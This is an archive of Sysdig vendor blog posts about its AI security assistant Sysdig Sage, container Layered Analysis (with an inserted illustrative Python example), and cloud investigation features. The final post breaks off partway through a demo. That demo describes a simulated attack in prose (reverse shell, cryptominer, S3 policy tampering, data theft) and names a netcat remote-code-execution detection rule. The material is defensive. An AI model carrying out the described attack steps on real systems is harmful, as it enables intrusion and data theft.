Sysdig Features Archives | Sysdig

Supercharge your investigation with Sysdig Sage™ for CDR
https://sysdig.com/blog/supercharge-your-investigation-with-sysdig-sage-for-cdr/
Tue, 06 Aug 2024 13:50:00 +0000
Artificial intelligence has taken over almost every aspect of our everyday lives. In cybersecurity, generative AI models with natural language processing are commonly being used to predict, detect, and respond to threats. But AI security assistants, although an upgrade from traditional machine learning, only provide very basic queries and summarization, which is insufficient to fully comprehend modern cloud attacks. As part of an ongoing effort to improve the cloud detection and response (CDR) experience, Sysdig has announced Sysdig Sage™, which makes it easier than ever to uncover active breach scenarios in real time. 

Sysdig Sage for CDR combines AI with security analysis as part of our ongoing mission to protect our customers in the cloud. Sysdig Sage observes your cloud data and generates responses that enable you to stop attackers. This revolutionary new AI assistant can also execute a variety of use cases, including contextual analysis of cloud and workload data, summarized event overview, and suggested remediations to contain an adversary.  

Here are just a few of the key new capabilities Sysdig Sage offers to enrich your CDR workflows:

  • Statistics on security events: Streamline analysis and proactively address breach scenarios by identifying critical events that need immediate attention.
  • Explanation of security events: Bridge skill gaps within security operations with detailed explanations of runtime events.
  • Suggested next steps: Reduce response timelines and improve compliance with behavioral details of relevant events at a broader level.
  • Contextual awareness: Contextualize the data a user observes to answer questions more precisely and move them across the platform to better visualize threats.

Let’s take a look at how Sysdig Sage can help you with a few key use cases.

Use case 1: Elevate skill gaps across operations

With Sysdig Sage, cybersecurity becomes easier for everyone. It refines your investigation journey as your team trawls through volumes of mundane tasks and events on a daily basis. It also helps foster collaborative workflows and motivates the team to stay vigilant for threats.

To demonstrate this, let’s narrow our scope and search for high-severity logs from a specific cluster. Use the search bar to enter the query below.

kubernetes.cluster.name=risks-aws-eks-workloads-shield

Sysdig Secure applies this query across volumes of cloud data and filters the events relevant to the chosen timeline and cluster name. At a glance, we have over 300 distinct events. Even for mature security operations, this volume of events could be overwhelming. Somewhere, somehow, it’s likely that a critical blind spot will be missed. These missed details will negatively impact response strategies and may leave an opening for an adversary to walk right in through the front door.

Figure: Events from the cluster

Sysdig Sage alleviates some major operational pain points by enabling users to ask questions in a natural language format, swiftly derive a quick summary of the situation, and deploy prescriptive response strategies to throw a wrench in the adversary’s plans.

For example, let’s launch Sysdig Sage and ask it to summarize our filtered results.

Summarize events for this cluster
Figure: Summarized events from Sysdig Sage

Sysdig Sage for CDR categorized the events under two distinct headers, namely Drift Detection and Malicious Binary Detected. Without any previous context of what the issue is, we now understand that the threat actor has managed to launch a malicious binary on several Kubernetes workloads, and we know that the Drift Detection policy (curated and maintained by our Sysdig Threat Research Team) prevented the listed workloads from being compromised. 

This information is enough to alert our security teams so they can deploy their established response strategies and mitigate the risk of a breach scenario. 

With Sysdig Sage, every user becomes a security investigator. 

Use case 2: Leverage AI to power your investigation

Sysdig Sage for CDR can respond to multiple queries in a row by correlating context from previous responses. This helps your teams uncover additional details relevant to an attack.

During a breach, you have very little time to do the necessary due diligence. We need to collect enough context at speed so the responsible teams can jump in and prevent the adversary from causing further damage. 

As an example, let’s use Sysdig Sage for CDR to perform a detailed analysis of all the events and generate an investigation report.

Generate detailed investigation report
Figure: Analysis and Investigation Report

From this report, we notice there’s an active miner (easyminer) running within the risk-10-aws-bedrock-java namespace. A quick online search reveals that the detected binary is a legitimate open source mining software. However, the presence of it within our environment is suspicious. 

The report indicates that the adversary, after compromising the workload, downloaded and launched a cryptominer to serve its objectives.

Let’s ask Sysdig Sage to help us understand the root cause of the detected event.

what was the root cause for the malicious binary detected on risk-10-aws-bedrock-java?
Figure: Root cause for events under specified namespace

Sysdig Sage for CDR understood our query in natural language and identified that the root cause responsible for triggering the detection event was a shell script, ./malicious-bin-event-gen.sh.

Within seconds, we have enough useful context about the detected malicious binary. Sysdig Sage for CDR has helped us answer the “what” and “why” of the event and saved valuable investigation time. However, our investigation is far from complete. 

Our next goal should be to understand the methods the adversary used to breach the perimeter and access our workloads. Let’s ask Sysdig Sage to list the tactics and techniques used by the threat actor according to the MITRE ATT&CK framework.

what MITRE ATT&CK tactics & techniques were used?
Figure: MITRE ATT&CK tactics and techniques related to the events

The results map the threat actor’s activity to MITRE ATT&CK tactics: executing the malicious binary, maintaining persistence, and evading defenses within the cluster.

At this stage, if you are curious about what’s going on under the hood, you can always use the accessibility options (top right) to pop into the Events Feed. Here, you’ll notice filters are automatically applied, and there’s a timeline of every malicious binary event detected within our defined cluster risk-10-aws-bedrock-java.

Figure: Filters are automatically applied as you query in Sysdig Sage

Now, to gain further context on each MITRE ATT&CK tactic, let’s ask Sysdig Sage to list the attack path.

list the attack path
Figure: Attack path aligned to MITRE framework

Within seconds, Sysdig Sage for CDR expands the process tree to align each detected event under a specific MITRE ATT&CK category. This helps discover all the possible entry points and the security gaps that were potentially exploited by the threat actor. 

But now the real question is, how severe is this event? Let’s ask Sysdig Sage to provide us with a blast radius, listing all the workloads that may have been impacted by the threat actor.

how many workloads were impacted?
Figure: Impacted workloads listed by Sysdig Sage

The results indicate that quite a lot of workloads were possibly impacted by the threat actor. After this, you should really be looking for the panic button and calling in the cavalry, aka your SecOps and DevSecOps teams.

Use case 3: Achieve the 555 Benchmark for Cloud Detection and Response 

We demonstrated in the previous use cases how you could use Sysdig Sage for CDR as your security assistant and gather the preliminary information crucial for any security investigation. However, if you are the only one holding the fort for your organization, you need to apply temporary fixes before alerting the specialists. 

Let’s ask Sysdig Sage for suggested steps that may help you to preempt any adverse events, like user credential compromise, SSH key exfiltration, process masquerading, and many more.

how do I fix this?
Figure: Suggested remediations by Sysdig Sage

Sysdig Sage for CDR recommends a few best practices to mitigate potential risks and prevent further compromise of your environment. Here, isolating the affected resource seems like a good way to stop the adversary in their tracks. 

But in case we didn’t know what to do in such a situation, let’s ask Sysdig Sage to provide us with detailed guidance.

give me detailed guidance on isolating affected resources
Figure: Guided response actions

Stay ahead of threats with Sysdig Sage

Sysdig Sage for CDR is the handy security assistant that first, helps you stay calm during an incident, and second, guides you along each step to uncover all the necessary details required for a thorough investigation. It makes a security incident feel like a simple DIY project.

Sysdig Sage empowers security teams to capitalize on the real-time nature of the Sysdig platform and the cutting-edge discoveries of the Sysdig Threat Research team. With Sysdig Sage at your side, you can accelerate your response to threats without leaving the platform.

Join our upcoming seminar: AI-Powered CDR in Action for a technical demonstration of how you can leverage Sysdig Sage to detect, investigate, and respond to attacks in minutes.

The post Supercharge your investigation with Sysdig Sage™ for CDR appeared first on Sysdig.

Sysdig Sage™ for CDR: Accelerate analysis, investigation and response
https://sysdig.com/blog/sysdig-sage-for-cdr-accelerate-analysis-investigation-and-response/
Wed, 31 Jul 2024 13:50:00 +0000
Last year, Sysdig outlined our vision for an AI-driven cloud security assistant. Today, we are excited to announce Sysdig Sage™ for cloud detection and response (CDR), our new release that embodies our vision. Built upon the core principles we introduced, Sysdig Sage offers actionable insights for cloud environments, with a focus on CDR. Sysdig Sage for CDR is the first milestone on the road to making AI assistance pervasive across our CNAPP platform, enabling customers to secure their cloud environments faster.

The 555 Benchmark for Cloud Detection and Response – 5 seconds to detect, 5 minutes to triage, and 5 minutes to respond – sets the standard for operating securely in the cloud. Achieving 555 means being able to detect and respond to cloud attacks faster than attackers can complete them.

With only 5 minutes to perform cloud investigations and block attacks before they are executed, Sysdig Sage for CDR accelerates analysis and investigation, allowing users to prioritize what matters. With Sysdig Sage, users can focus on attack responses rather than spending time connecting the dots or retrieving key information to understand the attack’s big picture and impact.

What is Sysdig Sage for CDR?

Sysdig Sage is a generative AI cloud security analyst – an expert that empowers users, letting them ask questions about their runtime events in natural language within Sysdig Secure’s Events Feed.

The Events page provides an overview of security events occurring across your infrastructure, allowing you to dive deep into specific details, distinguish false positives, and configure policies – based on open source Falco – to enhance security.

Sysdig Sage elevates these capabilities by infusing AI into security analysis operations, delivering:

  • Statistics of security events: Review top statistics for runtime security events based on various groupings such as policy name, rule (event type), severity, and more. This helps users streamline the analysis and quickly identify and focus on events that are relevant to the investigation.
  • Explanation of security events: Sysdig Sage can provide details about runtime events to users and dig deeper into them – for example, to explain the command lines that generated them. 
  • Suggested next steps: Sysdig Sage for CDR can get behavioral details from sample runtime events to summarize what happened at a broader level and suggest some next steps to fix and remediate the issues. This will help users move faster and immediately take action.
  • Context awareness: Sysdig Sage for CDR provides a fully integrated experience. It understands what users are navigating in the Secure UI and can control it, allowing users to quickly jump to the events and information relevant to their investigation.

See Sysdig Sage in action

As someone working in security operations, you might want to easily navigate, filter, and focus on relevant events. When viewing the Sysdig Events feed, you want to be able to understand the events you need to focus on.

You might filter out low and medium-severity events but still have tons of events to process. This is when Sysdig Sage can speed up your work. You are one click away from asking “Can you summarize these events?” Sysdig Sage will understand that you activated these filters in the UI and only focus on high-severity events that occurred in the last 6 hours:

Sysdig Sage controlling the Sysdig Secure Events Feed

You can then click on “Link to events” to quickly reach the events you want to analyze in the UI and keep the conversation going with a focus on the event you want to look at more closely:

At this point, you might want to better understand why the user was allowed to perform that action and if it represents a threat:

Now that you connected the dots, you will be able to start crafting your remediation strategy:

And finally: the big picture. Is the threat you analyzed part of a broader security incident? Let’s ask Sysdig Sage!

In just a few questions, you were able to refine your analysis, get all the needed information without leaving Sysdig Secure, and get guidance on what steps to take.

Unlock the power of AI for cloud security

Cloud attacks happen fast. Sysdig Sage for CDR is the ultimate secret weapon to equip security teams to achieve the 555 Benchmark for Cloud Detection and Response, quickly make informed decisions, rapidly respond to threats, and save time on the most complex tasks.

With Sysdig Sage you can:

  • Supercharge skills: Whether a novice or expert, Sysdig Sage for CDR will help you understand your runtime events.
  • Save time: Focus on outcomes, not the analysis. 
  • Get actionable insights: Know where to start and reduce time to respond – from hours to seconds.
  • Collaborate better: Level set knowledge across teams. 

By reducing analysis time to just seconds and seamlessly connecting the dots, Sysdig Sage for CDR impacts daily security operations, supercharging CNAPP capabilities with the power of AI.

Come talk to us about Sysdig Sage at our Black Hat booth.

Webinar: Outpacing cloud attackers with GenAI

Join Sysdig CTO, Loris Degioanni, to learn more about advanced AI strategies for rapid threat detection and response.

The post Sysdig Sage™ for CDR: Accelerate analysis, investigation and response appeared first on Sysdig.

Sysdig Sage™: A groundbreaking AI security analyst
https://sysdig.com/blog/sysdig-sage-a-groundbreaking-ai-security-analyst/
Wed, 31 Jul 2024 13:50:00 +0000
Generative AI (GenAI) is a top priority for organizations looking to increase productivity and solve business problems faster. In cloud security, AI chatbots to aid security practitioners are becoming more common, but to date, most of these solutions offer only basic queries and summarization. Diverse cloud environments and evolving threats require more from an AI security analyst.

To streamline investigation and help teams understand how to respond to fast-moving cloud attacks, AI for cloud security needs specialized, domain-specific programming, contextual awareness, and the ability for teams to have multi-step conversations that transform data into actionable insights.

Navigating cloud complexity

Cloud ecosystems and technology stacks can be incredibly complex. Navigating the intricacies of public and private clouds, containers, and Kubernetes requires domain expertise. Even seasoned professionals can find it challenging to stay ahead of the latest tech as it relates to cloud threats. For this reason, there is a tangible benefit to having an AI analyst that can instantly deliver the collective wisdom of human experts and the continuous learnings of AI models. 

Responding under pressure

Cloud security teams are under tremendous pressure as they race against the clock. When it’s crunch time, insufficient answers from an AI chatbot, or delays as you search for information, aren’t just stressful; they can give adversaries the upper hand. During an investigation or incident response, a lot of time can be wasted trying to determine what something is and how to respond. The proper response for a given scenario may be less obvious to less experienced team members. Getting fast, accurate assistance can make the difference between data and workloads being impacted – or not.

Accelerating human response with a purpose-built AI cloud security analyst

When you have only minutes to respond, the ability to have a conversation that helps you quickly understand a cybersecurity event and how to address it is extremely powerful. To provide this level of support requires capabilities beyond just collecting and compiling data from external sources. By employing multi-step reasoning, contextual awareness, and specialized domain-specific programming, AI for cloud security can offer a truly autonomous and comprehensive approach to security analysis.

Sysdig Sage - AI-powered cloud security analyst

This is the approach we’ve taken with Sysdig Sage, Sysdig’s AI cloud security analyst. Sysdig Sage interacts with users through human-like conversations, helping to peel back the layers of security events. 

Architecturally, Sysdig Sage uses an autonomous agents approach, leveraging multiple specialized AI agents that work collaboratively with a common goal: to simplify and accelerate security and enable a faster, better-informed human response. This unique architecture uses advanced agent-based reasoning to not only collect data, but also to provide meaningful, context-aware recommendations that are directly useful for security decisions.

Key capabilities of Sysdig Sage

Multi-step reasoning: Sysdig Sage helps security teams peel back the layers of sophisticated cloud threats through in-depth conversations. Start with a simple question and ask follow-up questions to dive deeper, gaining a clearer understanding of runtime events. Straightforward answers and suggested queries enable quick comprehension of security implications and risks in complex cloud estates.

Contextual awareness: Sysdig Sage understands the context of what users are currently observing in the Sysdig UI and provides precise answers based on that context. It helps you navigate the platform UI, directing you to visualizations that provide a deeper understanding of a given event. As a result, team members of all skill levels get the help they need to manage more and escalate less.

Guided response: Beyond summarizing and explaining threats, Sysdig Sage suggests proactive response actions, prevention strategies, and process improvements. It empowers you to take full advantage of the real-time nature of the Sysdig platform, along with insights available from the Sysdig Threat Research team. Considering the speed at which attacks progress in the cloud, fast answers on how to stop threats are key.

Using Sysdig Sage, cloud security teams are equipped to handle complex security tasks:

  • Incident investigation: Analyze incidents to determine root cause, including performed activities, cloud context, and responsible identities.
  • Prioritization: Prioritize threats based on multiple factors, including severity and potential impact.
  • Risk mitigation: Get effective strategies for mitigating identified risks and enhancing security posture and practices.

And, since Sysdig Sage is multilingual – with support for over 80 languages – you can take advantage of its insights in the language of your choice.

Comparing Sysdig Sage with traditional AI assistants

Sysdig Sage is a true AI security analyst. Looking at the landscape of AI assistance currently available, here’s how Sysdig Sage stacks up:

Insight generation vs. data aggregation

  • Traditional AI assistants: Focus on collecting and compiling data from various sources.
  • Sysdig Sage: Goes beyond aggregation to generate actionable insights through advanced agent-based reasoning.

Contextual awareness

  • Traditional AI assistants: Use a separate prompt interface with little or no UI interaction.
  • Sysdig Sage: Aware of the data the user is observing as context for queries; links users to directly relevant UI views.

Decision support vs. information presentation

  • Traditional AI assistants: Present summarized information for review.
  • Sysdig Sage: Provides detailed, step-by-step reasoning to support critical security decisions.

Adaptive problem-solving

  • Traditional AI assistants: Focus on specific use cases (e.g., remediation information).
  • Sysdig Sage: Tackles unforeseen challenges by combining autonomous agents’ specialized skills. Adaptability ensures AI remains effective in the face of evolving security threats.

Enhanced collaboration

  • Traditional AI assistants: Support single tasks.
  • Sysdig Sage: Acts as a true AI security analyst, supporting users in a free-flowing, contextual manner. Facilitates collaboration between human analysts and AI assistance.

Conclusion

As cloud security threats rapidly evolve, so too must capabilities for cloud security. AI capabilities built with multi-step reasoning and contextual awareness give defenders a new way to understand events, reduce escalations, and streamline response. If you’re new to cloud security, having an AI companion to offer insights and advice can help quickly build your skills and aid you in making the right call in the face of threats. And, if you’re a security veteran, finding ways to save time is likely at the top of your list – AI can help. 

Sysdig has designed its cloud security analyst, Sysdig Sage, to function like a team of experts by your side – always available to help you stay ahead of adversaries in an increasingly complex cloud landscape. We invite you to read the next blog in our launch series to learn more and see Sysdig Sage in action.

Webinar: Outpacing Cloud Attackers with GenAI

Join Sysdig CTO, Loris Degioanni, to learn more about advanced AI strategies for rapid threat detection and response.

The post Sysdig Sage™: A groundbreaking AI security analyst appeared first on Sysdig.

Introducing Layered Analysis for enhanced container security
https://sysdig.com/blog/layered-analysis-for-enhanced-container-security/
Tue, 23 Jul 2024 14:00:00 +0000
Containerized applications deliver exceptional speed and flexibility, but they also bring complex security challenges, particularly in managing and mitigating vulnerabilities within container images. To tackle these issues, we are excited to introduce Layered Analysis — an important enhancement that provides precise and actionable security insights.

What’s new: Layered Analysis capabilities

Layered Analysis enhances our container security toolkit by offering a granular view of container images, breaking them down into their constituent layers. This enables more accurate identification of vulnerabilities and optimized remediation workflows: it clearly discerns whether a vulnerability belongs to the base image or to the application layers, aiding in proper team assignment and resolution.

Key benefits

  • Enhanced accuracy and reduced time to fix: Identify vulnerabilities at each container image layer, pinpointing the specific package and instruction responsible, thereby reducing fix time.
  • Facilitate attribution and ownership: Discern whether vulnerabilities belong to the base image or the application layers, aiding in proper team assignment and resolution.
  • Actionable insights: Receive practical, contextual recommendations to expedite and prioritize vulnerability resolution.

Detailed insights with Layered Analysis

Container images are constructed in layers, with each change or instruction during the build process creating a new layer. Layered Analysis helps detect and display vulnerabilities and packages associated with each image layer, identifying different remediation actions and ownership depending on the layer introducing the vulnerabilities.


For example, vulnerabilities in the base OS layer, such as an end-of-life (EOL) Alpine version, can be remediated by updating the base image version, a task typically performed by the security team. In contrast, vulnerabilities in the application or non-OS layers, such as outdated Go libraries like Gin or Echo, can be addressed by updating the versions of libraries and dependencies, tasks that fall to the development teams.


How to enable and use Layered Analysis

Layered Analysis is now generally available and requires the following components for full functionality:

  • Cluster and Registry Scanners: Automatically supported with platform scanning.
  • CLI Version 1.12.0 or Higher: Ensure you are using the latest CLI version.
  • CLI Enhancements: Utilize new flags (--separate-by-layer and --separate-by-image) to modify output and view image hierarchy or layer information.
  • JSON Outputs: Updated to include new fields for detailed layer information.

Exploring the image hierarchy

Understanding the image hierarchy is key to Layered Analysis, as shown in the screenshot below.

This view shows the difference between base images and application layers, helping you quickly identify where vulnerabilities come from:

  • All layers: Shows the total number of vulnerabilities in the final image, including both application and OS layers. If a vulnerability is fixed in an intermediate layer, it won’t be included in the total count.
  • Base Images (prefixed with FROM): Display vulnerabilities present in the base image, including those inherited from parent images.
  • Application layers: Only show vulnerabilities introduced in the application layers, excluding those from base images.

Actionable recommendations

Layered Analysis doesn’t just identify vulnerabilities; it also provides recommendations to fix them. You’ll receive suggestions to upgrade base images, address the worst vulnerabilities in application layers, and fix problematic packages. 

These actionable insights help streamline the remediation process, ensuring that vulnerabilities are addressed efficiently and effectively.

Full visibility of image history

Layered Analysis also offers full visibility into the history of your container image. You can see packages that existed in previous layers but were removed in subsequent layers. 

While these packages no longer pose a security issue, having this historical view is invaluable for understanding the evolution of your image and ensuring comprehensive security management. 

This helps teams trace back through changes, making it easier to collaborate and maintain a secure container environment.

Investigate single layers

Another powerful feature of Layered Analysis is the ability to investigate single layers of your container image. You can see exactly what packages exist in each layer and identify any vulnerabilities introduced at that specific stage. 

This granular investigation capability allows teams to pinpoint the source of security issues and understand the impact of each layer’s changes. By isolating and analyzing single layers, you can more effectively manage and remediate vulnerabilities.
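The layer attribution described in this post (the All layers / Base image / Application layers hierarchy, the image-history view of removed packages, and single-layer investigation) can be modelled by replaying an image's build steps. The example below is an added illustration, not Sysdig's scanner code: the package names, versions, the EXAMPLE-* vulnerability ids and the five-layer image are constructed, and it assumes the base-image view means the image's state at the end of the FROM-inherited layers.

```python
"""Attribute container-image vulnerabilities to the layer that introduced them."""
from dataclasses import dataclass, field

@dataclass
class Layer:
    instruction: str                           # Dockerfile instruction that created the layer
    is_base: bool                              # True for layers inherited via FROM
    adds: dict = field(default_factory=dict)   # package -> version installed or upgraded here
    removes: set = field(default_factory=set)  # packages deleted in this layer

# Constructed vulnerability database: (package, version) -> ids.
# The ids are EXAMPLE-* placeholders, not real CVE numbers.
VULN_DB = {
    ("openssl", "1.1.1k"): {"EXAMPLE-0001"},
    ("curl", "7.83.0"): {"EXAMPLE-0002"},
    ("gin", "1.7.0"): {"EXAMPLE-0003"},
    ("echo", "4.9.0"): {"EXAMPLE-0004"},
}

def image_state(layers, upto=None):
    """Replay layers[:upto] in build order.
    Returns {package: (version, index of the layer that installed that version)}.
    A package removed by a later layer disappears; an upgrade replaces the
    version and re-attributes the package to the upgrading layer."""
    installed = {}
    for idx, layer in enumerate(layers[:upto]):
        for name in layer.removes:
            installed.pop(name, None)
        for name, version in layer.adds.items():
            installed[name] = (version, idx)
    return installed

def vulns_of(state, keep=lambda idx: True):
    """Look up installed packages in VULN_DB, keeping only those whose introducing
    layer satisfies `keep`. Returns {vuln_id: (package, version, layer_idx)}."""
    found = {}
    for name, (version, idx) in state.items():
        if keep(idx):
            for vid in VULN_DB.get((name, version), ()):
                found[vid] = (name, version, idx)
    return found

def all_layers_view(layers):
    """'All layers': what the final image carries. A vulnerability fixed (removed
    or upgraded) in an intermediate layer is not counted."""
    return vulns_of(image_state(layers))

def base_image_view(layers):
    """'Base image' (FROM): the base image's own state, i.e. after the last
    inherited layer and before any application layer could patch it."""
    n_base = sum(1 for layer in layers if layer.is_base)  # FROM layers come first
    return vulns_of(image_state(layers, upto=n_base))

def application_view(layers):
    """'Application layers': only what application layers introduced and the
    final image still carries; base-image findings are excluded."""
    return vulns_of(image_state(layers), keep=lambda idx: not layers[idx].is_base)

def layer_view(layers, idx):
    """Single-layer investigation: vulnerabilities introduced by one layer's own changes."""
    found = set()
    for name, version in layers[idx].adds.items():
        found |= VULN_DB.get((name, version), set())
    return found

def removed_packages(layers):
    """Image history: packages present in an earlier layer but removed later.
    Returns {package: (introduced_idx, removed_idx)}."""
    history, seen = {}, {}
    for idx, layer in enumerate(layers):
        for name in layer.removes:
            if name in seen:
                history[name] = (seen.pop(name), idx)
        for name in layer.adds:
            seen.setdefault(name, idx)
    return history

# Constructed five-layer image: two layers inherited from the FROM base image,
# then three application layers, one removing a package and one upgrading a
# vulnerable library.
IMAGE = [
    Layer("FROM alpine (OS packages)", True, adds={"musl": "1.2.3", "openssl": "1.1.1k"}),
    Layer("RUN apk add curl", True, adds={"curl": "7.83.0"}),
    Layer("RUN go mod download", False, adds={"gin": "1.7.0", "echo": "4.9.0"}),
    Layer("RUN apk del curl", False, removes={"curl"}),
    Layer("RUN go get github.com/gin-gonic/gin@v1.9.1", False, adds={"gin": "1.9.1"}),
]

def report(layers):
    """The views as sorted id lists, for printing or asserting on."""
    return {
        "all": sorted(all_layers_view(layers)),
        "base": sorted(base_image_view(layers)),
        "app": sorted(application_view(layers)),
        "removed": removed_packages(layers),
    }
```

For the constructed image, report(IMAGE) shows the base view carrying EXAMPLE-0001 and EXAMPLE-0002 while the final image keeps only EXAMPLE-0001 and EXAMPLE-0004, because curl was deleted and gin upgraded in application layers; routing the openssl finding to the base-image owners and the echo finding to the developers follows directly from the layer index attached to each id.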

Leveraging Layered Analysis for better security

Layered Analysis empowers security and development teams by providing a clear and actionable view of container image vulnerabilities. By enhancing the precision of vulnerability identification and optimizing remediation workflows, teams can effectively reduce risks and improve overall security.

With Layered Analysis, teams can pinpoint exactly where a vulnerability was introduced, identifying the specific layer responsible. This capability is particularly useful in large organizations where multiple teams are involved in the containerized application lifecycle, from building images to deploying and monitoring their health: infrastructure engineers creating and curating base images, developers packaging applications, and all of them working together to keep workloads as secure and vulnerability-free as possible and to apply security patches promptly. By tracing vulnerabilities back to their source, teams can determine responsibility and ensure accountability.

By clearly distinguishing between base image and application layer vulnerabilities, Layered Analysis enables more efficient routing of remediation tasks. Security teams can focus on updating base images to mitigate inherited vulnerabilities, while development teams handle issues within the application layers. This structured approach not only streamlines the remediation process but also enhances the overall security posture of containerized environments.

Want to learn more? Reach out to your Sysdig representative, or book a demo here!

The post Introducing Layered Analysis for enhanced container security appeared first on Sysdig.

Introducing New Investigation Features for Sysdig Secure
https://sysdig.com/blog/sysdig-introduces-new-cdr-investigation-features/
Mon, 17 Jun 2024 13:45:00 +0000
Cloud migration and continuous innovation provide organizations with substantial gains in speed, scalability, and cost (to name a few). Most security teams have no choice but to make the jump to the cloud, in at least some capacity, to support and protect this rapidly expanding attack surface. 

But organizations and security teams aren’t alone. Threat actors have been readily adapting their craft to take advantage of cloud speed. As a result, cloud attacks happen fast, rapidly weaving through a target’s cloud estate and drawing on extensive capabilities to achieve their goals. 

A prime example is the SCARLETEEL attack, which can infiltrate an organization, execute cryptominers, uncover cloud credentials, pivot to other cloud accounts, and ultimately exfiltrate proprietary data – all in just 220 seconds. Investigating cloud attacks like SCARLETEEL has traditionally been a laborious, error-prone, and manual process. The odds are stacked against defenders, and the reality is that security teams are often unable to investigate threats before the attack completes. 

That’s why the 5/5/5 Benchmark for Cloud Detection and Response – the only industry standard for cloud security – establishes that you have just five minutes to perform cloud investigations to head off attacks before they can be executed.

What’s new: Enhanced investigations capabilities

Today, Sysdig is streamlining cloud detection and response (CDR) use cases by automating the collection and correlation of events, posture, and vulnerabilities to identities. The cloud context these capabilities provide is unparalleled. An interactive visualization of this information helps analysts instantly conceptualize attacks, unlocking five-minute investigations across the most advanced threats. 

The key new capabilities enhancing investigations include:

Attack chain visualization 

Security teams can leverage any alert or suspicious finding as a starting point to launch an investigation with the Sysdig Cloud Attack Graph. The graph provides attack chain visualization and empowers security analysts to rapidly understand the relationships between resources, and their implications for the attack chain across any cloud environment.

Overlaying threat context with the Sysdig security graph gives responders a quick understanding of the blast radius of an attack.

Sysdig’s attack chain visualization accelerates investigations by automatically correlating cloud and workload events to identities. Deep context from command history, as well as network and file activity, is easily gleaned from the overlays. Sysdig’s automated captures enable analysts to dig deeper by automatically tying digital forensic evidence to the events. Real-time context is combined with vulnerabilities and misconfiguration findings to provide a comprehensive and holistic view of a threat. To further simplify workflows, and narrow an investigation window when necessary, all investigations are MITRE-mapped and filterable. 

Contextualize posture, vulnerabilities, and deep runtime insights, including activity audit and process trees.

Real-time identity correlation 

At their core, all cloud attacks revolve around identities. Whether it be human or machine, one or many, analysts need a way to stitch suspicious findings to identities and their associated behaviors. Sysdig’s enhanced investigation capabilities automatically correlate cloud events with enriched identity data. Using attack chain visualization, analysts can rapidly understand suspicious identity behaviors such as unusual logins, impossible travel scenarios, and malicious IP addresses. With this context, teams can rapidly understand the who, what, where, and how of threat actors in their infrastructure.

Understand the activity happening in your cloud environments with identity investigation.

This visibility also helps teams rapidly rightsize excessive permissions, for example by restoring an identity's permissions to what they were before it was compromised by a malicious adversary. 

Understand an attached role and investigate it further.

Investigation workflow optimization 

A single purpose-built platform can break silos and streamline downstream activities. Security becomes a critical and valuable business partner by delivering relevant, high-context guidance across key stakeholders. Rapid investigation findings enable prescriptive guidance for response actions across incident response, platform, developer, and DevSec teams. These accelerated findings allow response teams to initiate a response within five minutes, adhering to the five-minute response standard outlined in the 5/5/5 Benchmark.

Closing the loop, the enhanced incident debrief findings these investigations provide (such as what misconfigurations, permissions, and vulnerabilities were abused to perpetuate the attack) can then be shared to tune and harden preventive controls. This focus on perpetual improvement to preventative controls helps ensure incidents are non-recurring, reducing organizational cloud risk.  

Outpace cloud attacks with Sysdig’s enhanced investigations

The acceleration of cloud detection and response is critical to combat modern attacks. The automation-fueled pace of cloud attacks means that investigations must move even faster. Sysdig’s enhanced investigations unlock security teams by increasing efficiency, reducing skill gaps, and empowering security and platform teams to make better-informed decisions, faster. 

Join our upcoming webinar, Cloud Investigations in Just 5 Minutes, for a discussion with security experts on the evolution of cloud detection and response and its impacts. 

How to Cut Cloud Investigations to 5 Minutes with Sysdig https://sysdig.com/blog/cut-threat-investigation-times-down-to-5-minutes/ Mon, 17 Jun 2024 13:45:00 +0000 https://sysdig.com/?p=90134 Cloud breaches continue to rise unabated as organizations adopt hybrid cloud strategies. Many organizations have tried to simply extend their...

The post How to Cut Cloud Investigations to 5 Minutes with Sysdig appeared first on Sysdig.

Cloud breaches continue to rise unabated as organizations adopt hybrid cloud strategies. Many organizations have tried to simply extend their preexisting on-premises security into the cloud, but the cloud is a fundamentally different environment for security. It’s faster, more complex, and more dynamic, with an ever-increasing attack surface. Striking first means adversaries have a head start by default, leaving organizations only a fraction of time to investigate and initiate a response.  

With all this in mind, it’s no surprise that according to Forrester research, “cloud detection and response is the next and most important frontier for security operations teams.”1 To answer this need, Sysdig’s real-time cloud investigation gives organizations back precious time, reduces skill gaps, and grants security and platform teams the ability to make faster, better-informed decisions. 

Sysdig’s new investigation capabilities enable customers to optimize their cloud detection and response (CDR) use cases with automated collection and correlation of all their cloud data, including events, posture misconfigurations, and exploitable vulnerabilities to identities. 

The improved user interface allows security teams to interact with and instantly decipher the most complex attack chains, unlocking your ability to investigate threats in under 5 minutes, as outlined in the 555 Benchmark. 

The key new capabilities enriching your investigations include:

  • Attack chain visualization – Leverage any alert or suspicious finding as the starting point to launch an investigation with the Sysdig Cloud Attack Graph. 
  • Real-time identity correlation – Enhanced investigation capabilities automatically correlate cloud events with identity data.
  • Investigation workflow optimization – A single purpose-built platform breaks silos and streamlines downstream activities for security personas with diverse skill sets.

See our new investigation features in action

Sysdig’s new investigation flow automatically stitches together context from across the Sysdig platform. It rapidly identifies the root cause of events and contextualizes data to speed up investigations in the cloud.

To demonstrate the power of Sysdig’s new investigation capabilities, we simulated a SCARLETEEL attack that exploits a vulnerable application in a containerized workload. This includes steps to establish a reverse shell, download a cryptominer, elevate privileges to disable S3 bucket policies, and steal customer data.

Figure: SCARLETEEL attack mapped to the MITRE ATT&CK framework

We begin our investigation with the Events Overview dashboard. Security teams typically monitor a similar-looking dashboard across their multi-cloud environment. 

If we set the time frame to six hours using the time picker below, we notice a sudden spike in the volume of high-severity events (see Events By Severity widget) within this short time frame. This is unusual; on most days you do not see this many events, and since you must assume any unusual activity could indicate a breach, this aberration is suspicious and warrants a prompt response. Our goal is to triage and collect as much information as possible to create a deep contextual narrative.

Figure: Events Overview dashboard indicating the spike in events

First, let’s dive in and look at the events to uncover answers that explain this unusual spike seen on our dashboard. Filter for high-severity events to quickly intercept any ongoing attacks launched by the threat actors. 

Figure: Filter for high-severity events

We are redirected to the Events feed, where all cloud events are logged and enriched with details, including the triggered Sysdig rules/policies, timestamps, account IDs, cluster names, user names, and the IP address. 

Figure: Events feed

This enables us to visualize the timeline of events leading up to a cloud attack. It also eliminates the skill gap, allowing analysts to easily ascertain the severity of an attack, the impacted cloud workloads, and the compromised user accounts. The search bar at the top and the filters on the left narrow your scope of events to investigate, thereby improving your internal metrics, such as SLAs (service-level agreements), MTTI (mean time to investigate), and MTTR (mean time to respond). 

Sysdig’s Threat Research Team also curates and maintains an exhaustive library of rules you can use, such as the following example:

ruleName = Netcat Remote Code Execution in Container

To filter relevant events within the defined time frame (six hours in our demo), we would simply type the above string in the Search bar. Alternatively, you could also use the left panel to derive similar results. This reduces noise and scopes the feed to the events that could explain the unusual spike detected earlier. 

